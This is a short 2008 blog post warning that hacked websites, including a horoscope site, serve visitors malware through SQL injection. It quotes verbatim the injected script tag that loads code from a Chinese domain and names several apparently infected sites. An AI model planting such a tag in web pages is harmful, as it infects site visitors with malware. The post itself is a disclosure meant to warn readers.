May 28, 8:47 AM PDT (GMT-7)
So called "trusted" web sites are no longer trustworthy as I reported in my earlier blog:
Hacked in the Green Zone
The good news is that the San Francisco Chronicle reported on this on May 6, 2008:
Internet criminals gaining ground, experts say
The bad news is that I found a new problem. And I did not see that anyone else has picked up on the problem.
Here is what I found. On the morning of Tuesday May 27, 2008 the StarIQ.com Daily Horoscope was hacked.
Embedded inside of the description for each sign of the zodiac was a tag like this:
<script src=http://www.dota11.cn/m.js></script>
So if a Windows computer user clicked on his sign, then he would download some spambot, virus or
who knows what from several web sites registered in China.
Essentially, the home computer is compromised and the hacker can do anything he likes with the machine.
Is StarIQ.com the only web site to have this problem?
Heck no. Doing a google search comes up with over 200,000 hits.
Thousands of these websites are still infected!
Examples: (Don't go to these websites unless you are protected!)
www.morrellwinebar.com
www.bioimmune.com
www.americancapitalrealty.net
How did this happen? I would like to know. Somehow hackers are compromising thousands of web sites like StarIQ.com and changing their web pages.
What can the average home computer user do? Use the
Firefox web browser with the
NoScript add-on.
Another option is to just not use Windows, use Linux.
Update May 29 9:53 AM PDT
I reported the problem to Google.com and they flagged dota11.cn as a "bad" website. So if you do a
Google search and try to click on an infected website, then a warning page appears first.
The "cause" of the infection appears to be by SQL injection into the Microsoft SQL server by use of custom
variables to a web form input, the same old web cgi, client-server problems that have been around for decades.
Here is a technical description of the problem:
www.0x000000.com